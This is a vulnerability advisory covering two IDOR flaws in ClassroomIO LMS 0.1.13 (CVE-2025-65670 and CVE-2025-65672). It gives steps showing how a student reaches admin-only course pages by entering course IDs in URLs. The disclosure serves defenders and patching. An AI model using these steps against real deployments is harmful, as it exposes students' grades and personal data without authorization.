Classroomio LMS 0.1.13 Insecure Direct Object Reference

Classroomio LMS version 0.1.13 suffers from an Insecure Direct Object Classroomio LMS version 0.1.13 suffers from an Insecure Direct Object Reference (IDOR) vulnerability.

This flaw allows an authenticated user to access or manipulate data belonging to other users without proper authorization. For instance, by simply changing a numerical ID in a URL parameter (e.g., `user_id=123` to `user_id=124`), a student could potentially view another student's profile, grades, or even assignments.

The system fails to adequately verify if the requesting user is authorized to access the specific object referenced by the ID. This leads to a severe privacy breach, allowing unauthorized data disclosure and potentially data manipulation, compromising the integrity and confidentiality of user information across the platform. Admins should update to a patched version or implement robust server-side authorization checks for all object references.

# CVE-2025-65670
An Insecure Direct Object Reference (IDOR) in classroomio 0.1.13 allows students to access sensitive admin/teacher endpoints by manipulating course IDs in URLs, resulting in unauthorized disclosure of sensitive course, admin, and student data. The leak occurs momentarily before the system reverts to a normal state restricting access.Discovered by - Rivek Raj Tamang (RivuDon), Sikkim, India.

**Affected Product: ClassroomIO**
* Affected Version: 0.1.13
* **Discovered by: Rivek Raj Tamang (RivuDon), Sikkim, India**

## Vulnerability Details
Insecure Direct Object Reference / Broken Access Control

# Summary
This vulnerability allows a student-level user to momentarily access privileged admin-only endpoints by directly manipulating course IDs in the URL. Due to missing authorization checks and improper access validation, sensitive course analytics, attendance records, submissions, people lists, and marks become exposed before the system reverts to enforcing restrictions. This brief but critical information disclosure constitutes an IDOR-based Broken Access Control issue and can lead to leakage of sensitive administrative and student data.

## Steps to Reproduce
Login as Admin

1. Create and publish a course with enrolled students.

2. Access admin endpoints for the course e.g..

courses/<course-ID>/analytics, courses/<course-ID>/attendance, courses/<course-ID>/submissions, courses/<course-ID>/people, courses/<course-ID>/marks,

3. Admin can view expected data.

Login as Student

4. Join the course via Explore

5. Verify Students cannot see admin in the UI

6. Find the course ID (e.g. by inspecting course lessons URL).

7. Manually access the admin endpoints by crafting URLs such as:

courses/<course-ID>/analytics, courses/<course-ID>/attendance, courses/<course-ID>/submissions, courses/<course-ID>/people, courses/<course-ID>/marks,

8. The system responds with data meant only for Admin/Teacher roles momentarily, leaking sensitive information before reverting to restricting access.



# Acknowledgement

This vulnerability was discovered and responsibly reported by:

**Rivek Raj Tamang (RivuDon) from Sikkim, India**

https://www.linkedin.com/in/rivektamang/

https://rivudon.medium.com/


-------------------

# CVE-2025-65672
Insecure Direct Object Reference (IDOR) in classroomio 0.1.13 allows unauthorized share and invite access to course settings.

**Affected Product: ClassroomIO**
* Affected Version: 0.1.13
* **Discovered by: Rivek Raj Tamang (RivuDon), Sikkim, India**

## Vulnerability Details
Insecure Direct Object Reference (IDOR) / Broken Access Control

# Summary
ClassroomIO version 0.1.13 contains an IDOR vulnerability that allows a student (non-privileged user) to access restricted Course Settings, specifically the Share and Invite management interfaces.
This flaw arises due to improper authorization checks on sensitive endpoints, enabling privilege escalation and unauthorized course manipulation.

## Steps to Reproduce
1. Create Course (Admin)

2. Log in as an Admin and create/publish a new course.

3. Student View
Log in as a Student.

Navigate to the course using the Explore page.

Note the course ID in the URL.

5. Access Restricted Pages Directly
Replace {course-id} with a valid course ID and visit:

/courses/{course-id}/settings#share

/courses/{course-id}/people?add=true

7. Observe the Impact
The student is able to access:

Share Settings

Invite/People Management Panel

These actions are meant only for the course admin, but due to missing access checks, the student gains unauthorized control.

# Acknowledgement

This vulnerability was discovered and responsibly reported by:

**Rivek Raj Tamang (RivuDon) from Sikkim, India**

https://www.linkedin.com/in/rivektamang/

https://rivudon.medium.com/